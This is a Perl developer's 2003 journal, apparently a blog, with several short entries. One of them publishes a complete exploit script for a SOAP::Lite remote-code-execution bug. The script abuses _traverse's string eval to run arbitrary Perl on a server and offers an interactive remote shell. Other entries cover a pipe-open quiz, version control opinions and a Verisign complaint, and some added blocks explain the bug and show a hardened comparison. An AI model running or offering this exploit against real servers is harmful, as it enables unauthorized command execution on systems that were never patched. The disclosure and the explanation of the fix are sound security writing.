
Journal of IlyaM (2933)

Tuesday October 14, 2003
07:09 AM

open() and pipes quiz

What is the difference between these two lines (on Linux with Perl 5.8.x or 5.6.x)? More precisely, why does only the first open die?

open(FH, '/doesnt/exist  2>&1 |') or die "Cannot pipe: $!";

open(FH, '/doesnt/exist\\  2>&1 |') or die "Cannot pipe: $!";

Hint, if you have no idea: try removing 2>&1 from the command line.
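The mechanism behind this quiz, as an added example that is not part of the original entry. Two things about the two-argument pipe form of open() matter here: when the command string contains shell metacharacters perl hands it to /bin/sh -c, so the exec that can fail is the shell's, and the program's own failure only shows up later on read or close; when it contains none, perl execs the program itself and open() reports the failed exec. In addition, perl treats a trailing 2>&1 as a request to dup stderr onto stdout itself rather than as a reason to involve the shell (that is my reading of the metacharacter check in perl's doio.c; the character list in needs_shell below is mine, not quoted from the source). The function names and the script are mine; /doesnt/exist is the page's own bogus path, and the list-form open needs Perl 5.8 or later.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Mirrors the test perl applies to a one-argument command (see "system"
# in perlfunc): metacharacters mean /bin/sh -c, none means direct exec.
# A trailing "2>&1" by itself is handled by perl with dup2 and does not
# trigger the shell.
sub needs_shell {
    my $cmd = shift;
    (my $stripped = $cmd) =~ s/\s+2>&1\s*$//;
    return $stripped =~ /[\$&*(){}\[\]'";\\|?<>~`\n]/ ? 1 : 0;
}

# Two-argument pipe open.  Reports whether open() itself succeeded and,
# if it did, what the child printed and the exit status seen by close().
sub try_pipe_open {
    my $cmd = shift;
    my $pid = open(my $fh, "$cmd |");
    return { open_ok => 0, error => "$!" } unless $pid;
    my $output = do { local $/; <$fh> };
    close $fh;
    $output = '' unless defined $output;
    chomp $output;
    return { open_ok => 1, output => $output, status => $? >> 8 };
}

# List form (Perl 5.8+): never a shell, so an exec failure is always
# visible to open(), and no argument can be re-parsed by /bin/sh, which
# is the command-injection hazard of building a string for the
# two-argument form.  The list must have more than one element, or perl
# falls back to the string rules above.
sub try_list_open {
    my @argv = @_;
    my $pid = open(my $fh, '-|', @argv);
    return $pid ? 1 : 0;
}

my @quiz = (
    '/doesnt/exist  2>&1',     # nothing left after 2>&1 is taken off: direct exec, open fails
    '/doesnt/exist\\  2>&1',   # the backslash is a metacharacter: sh runs it, open succeeds
);

for my $cmd (@quiz) {
    my $r = try_pipe_open($cmd);
    printf "%-26s shell=%d open=%d %s\n", $cmd, needs_shell($cmd), $r->{open_ok},
        $r->{open_ok}
            ? "exit status $r->{status} (sh reports command not found as 127), output: $r->{output}"
            : "error: $r->{error}";
}

# Same bogus program, list form: "2>&1" is just an argument string here.
my $ok = try_list_open('/doesnt/exist', '2>&1');
printf "list-form open: open=%d%s\n", $ok, $ok ? '' : " error: $!";
```

Run it as-is on Linux: the first quiz line fails inside open(), the second succeeds and only the shell's complaint and non-zero exit status reveal that nothing useful ran. For anything that builds a command from data it did not generate itself, the list form is the one to use, precisely because it never consults the shell.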

Monday October 06, 2003
04:44 AM

PerlQuotes

Link of the day: PerlQuotes. It must be converted into a fortune data file!

Update: I've got an email from Tina Mueller and she told me that she has added a fortune data file. Cool!

Friday October 03, 2003
05:31 AM

Opensource version control systems review

Just found a quite interesting review of different opensource version control systems.

As for me, I'm trying to choose between Aegis and arch. I'm looking with very big suspicion at subversion - my gut feeling is that subversion is overengineered. Instead of solving real VC problems we see Apache integration, WebDAV, a binary db backend. In the end, from the point of view of an end user (i.e. me), it doesn't offer much more than old CVS.

P.S. And, yeah, BitKeeper rocks. But it is too expensive for us.

Wednesday September 24, 2003
03:01 AM

Overloaded abbrevs 2

Continuing my previous journal entry about the XP abbrev.

Just noticed that a popular Russian forum on extreme programming now has a warning on its first page which literally translates as: If you will ask questions about Windows XP we will find and kill you! :)

Friday September 19, 2003
02:54 PM

Old SOAP::Lite exploit

About a year ago I announced that I had written a SOAP::Lite exploit. I didn't publish the exploit though I promised to. Interestingly enough, nobody asked me for proof - so far only Paul Kulchenko (the SOAP::Lite author) and Randy J Ray have seen it. Well, in case it is still of interest to somebody, I'm publishing it here:

#!/usr/bin/perl -w

# Copyright (c) 2002 by Ilya Martynov. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the same terms as Perl itself.

# This program exploits security bug in SOAP::Lite which allows any
# SOAP client call any Perl subroutine as class/object method on side
# of SOAP::Lite based SOAP server.
#
# This vulnerability have been found by stealth <stealth@segfault.net>
# and described in Phrack article 'RPC without borders':
#
#     http://www.phrack.com/show.php?p=58&a=9
#
# This program shows how to
#
# 1) evaluate any Perl code inside SOAP::Lite based server
#
# 2) access remote pseudo shell
#
# using this security bug.

use strict;

use SOAP::Lite;
use Term::ReadLine;

my($uri, $proxy) = @ARGV;
unless(defined $proxy) {
    die "Usage: $0 URI PROXY\n";
}

my $soap = connect_soap($uri, $proxy);
shell($soap);

# returns soap object
sub connect_soap {
    my $uri = shift;
    my $proxy = shift;

    my $soap = SOAP::Lite
    -> uri($uri)
    -> proxy($proxy);

    return $soap;
}

# evals any Perl code on side of SOAP::Lite based server
sub remote_eval {
    my $soap = shift;
    my $expr = shift;

    # escape Perl expression
    $expr = escape_single_quoted($expr);

    # code to run on side of SOAP::Lite server
    my $code = <<CODE;
{
    # make sure exploit works in tainted mode
    local \%ENV = \%ENV;
    (\$ENV{PATH}) = \$ENV{PATH} =~ /(.*)/;
    delete \@ENV{qw(IFS CDPATH ENV BASH_ENV)};

    # evaluate Perl code
    my \$ret = eval '$expr';
    # catch errors
    if(\$\@) { \$ret = \$\@ }
    # put result into array which will be returned to SOAP client
    \$pointer->[0] = \$ret;
}
1
CODE

    my @params = ([], $code, '[1]');

    my $som = $soap->call('X:SOAP::SOM::_traverse' => @params);

    return $som->result->[0];
}

# simple pseudo shell which allows to execute commands on side of
# SOAP::Lite based server
sub shell {
    my $soap = shift;

    my $term = new Term::ReadLine 'SOAP::Lite remote shell';
    my $OUT = $term->OUT || \*STDOUT;

    while (defined (my $cmd = $term->readline('> ')) ) {
        chomp $cmd;
        my $cmd = escape_single_quoted($cmd);
        print $OUT remote_eval($soap, "qx'$cmd'");
        $term->addhistory($cmd) if $cmd =~ /\S/;
    }
}

# escapes string which is going to be used as single quoted string
sub escape_single_quoted {
    my $string = shift;

    $string =~ s/(['\\])/\\$1/g;

    return $string;
}

How does it work? Before 0.55 it was possible to call any subroutine in any Perl package inside a SOAP::Lite based server (at least when autodispatch is turned on). Package X:SOAP::SOM used to contain (and actually still contains) the subroutine _traverse:

# source code of _traverse from 0.52
sub _traverse {
  my $self = shift;
  my($pointer, $itself, $path, @path) = @_;

  if ($path && substr($path, 0, 1) eq '{') {
    $path = join '/', $path, shift @path while @path && $path !~ /}/;
  }

  my($op, $num) = $path =~ /^\[(<=|<|>=|>|=|!=?)?(\d+)\]$/ if defined $path;

  return $pointer unless defined $path;

  $op = '==' unless $op; $op .= '=' if $op eq '=' || $op eq '!';
  my $numok = defined $num && eval "$itself $op $num";
  my $nameok = (o_lname($pointer) || '') =~ /(?:^|\})$path$/ if defined $path; # name can be with namespace

  my $anynode = $path eq '';
  unless ($anynode) {
    if (@path) {
      return if defined $num && !$numok || !defined $num && !$nameok;
    } else {
      return $pointer if defined $num && $numok || !defined $num && $nameok;
      return;
    }
  }

  my @walk;
  push @walk, $self->_traverse_tree([$pointer], @path) if $anynode;
  push @walk, $self->_traverse_tree(o_child($pointer), $anynode ? ($path, @path) : @path);
  return @walk;
}

As you can see, one of the code paths contains a call to eval. And since we can call this subroutine directly, we can pass whatever Perl code we want to this eval. The only thing required for the exploit to work is to supply the correct arguments to this subroutine to enable the code path with eval.
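The line that makes this reachable is `eval "$itself $op $num"`: $itself was meant to be a node index, nothing checks that it is one, and the operator and both operands are concatenated into Perl source. The entry says 0.55 closed the hole; the added example below is mine, not SOAP::Lite code and not a claim about what the 0.55 fix did. It puts the comparison as 0.52 performs it next to a version with the same result that never compiles caller-supplied text, and shows that only the eval version runs a value that is not a number (the injected text just sets a flag). The function names compare_by_eval and compare_safe are mine.

```perl
#!/usr/bin/perl
use strict;
use warnings;

our $side_effect = 0;   # set by the non-numeric $itself in the demo below

# The comparison exactly as _traverse builds it in 0.52: operator
# normalisation, then string eval of the assembled expression.
sub compare_by_eval {
    my ($itself, $op, $num) = @_;
    $op = '==' unless $op;
    $op .= '=' if $op eq '=' || $op eq '!';
    return eval "$itself $op $num";    # whatever $itself contains is compiled here
}

# Same six operators _traverse accepts, as closures instead of source text.
my %cmp = (
    '==' => sub { $_[0] == $_[1] },
    '!=' => sub { $_[0] != $_[1] },
    '<'  => sub { $_[0] <  $_[1] },
    '<=' => sub { $_[0] <= $_[1] },
    '>'  => sub { $_[0] >  $_[1] },
    '>=' => sub { $_[0] >= $_[1] },
);

# Hardened form: both operands must be plain non-negative integers (the
# only thing a node index can be) and the operator must be one we know.
# Anything else is refused instead of being handed to the compiler.
sub compare_safe {
    my ($itself, $op, $num) = @_;
    $op = '==' unless $op;
    $op .= '=' if $op eq '=' || $op eq '!';
    for my $v ($itself, $num) {
        return unless defined $v && $v =~ /\A\d+\z/;
    }
    my $fn = $cmp{$op} or return;
    return $fn->($itself, $num) ? 1 : 0;
}

# Normal use: does node 3 satisfy a path element like "[<=5]"?
print "eval: ", (compare_by_eval(3, '<=', 5) ? "match" : "no match"), "\n";
print "safe: ", (compare_safe(3, '<=', 5)    ? "match" : "no match"), "\n";

# A non-numeric $itself.  The text is harmless by construction; the point
# is that the eval version executes it at all, with $op and $num appended.
my $not_an_index = '0; $main::side_effect = 1; 1';

compare_by_eval($not_an_index, undef, 1);
print "eval ran caller-supplied text: side_effect=$side_effect\n";

$side_effect = 0;
my $r = compare_safe($not_an_index, undef, 1);
print "safe refused it: result=", (defined $r ? $r : 'undef'),
      " side_effect=$side_effect\n";
```

Restricting which packages a SOAP request may dispatch to is the fix that actually closes the hole; removing the string eval is the second layer, so that reaching _traverse with odd arguments yields a refused lookup rather than code execution.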

I hope all of you have upgraded to 0.55 - after all, this release, which fixes the security hole used by this exploit, was released a year ago.

09:26 AM

I'm 25 as of today

My wife gave me the coolest present for my birthday - an espresso machine. Natasha, if you are reading this, thank you again :)

Update: Fixed s/made present/gave present/. Thanks to jdavidboyd and phillup for the free English lesson :)

03:00 AM

New release of Mail::CheckUser (thanks to Verisign)

Those idiots from Verisign are breaking the internet, and this breakage affected Mail::CheckUser. Rob Brown patched Mail::CheckUser to stop accepting bogus domains and I've just uploaded a new version (1.21) to CPAN.

If you use or develop any software affected by Verisign's "innovations" you may find this page interesting.

In other news, Verisign was sued over VeriSign's new "services". I hope Verisign will burn in hell.

Update: Those Verisign monkeys cannot even write a simple search page without XSS bugs. See here (warning - explicit content). I've made a screenshot in case they fix it. Thanks to Pan T. Hose from slashdot for spotting it.

Tuesday September 16, 2003
04:13 AM

New unpublished ssh exploit?

If this is true, it is quite scary.

Thursday September 11, 2003
03:53 AM

I'm fed up with SourceForge

  • Mailing list archives break too often
  • Mailing list archives do not show attachments
  • The web interface to CVS and anonymous CVS access lag by up to 24 hours

Yes, it is a free service, and if I don't like it I can pack my things and go somewhere else. Well, probably I will do exactly that.

02:50 AM

Copyright on blank lines

LOL, this is really funny.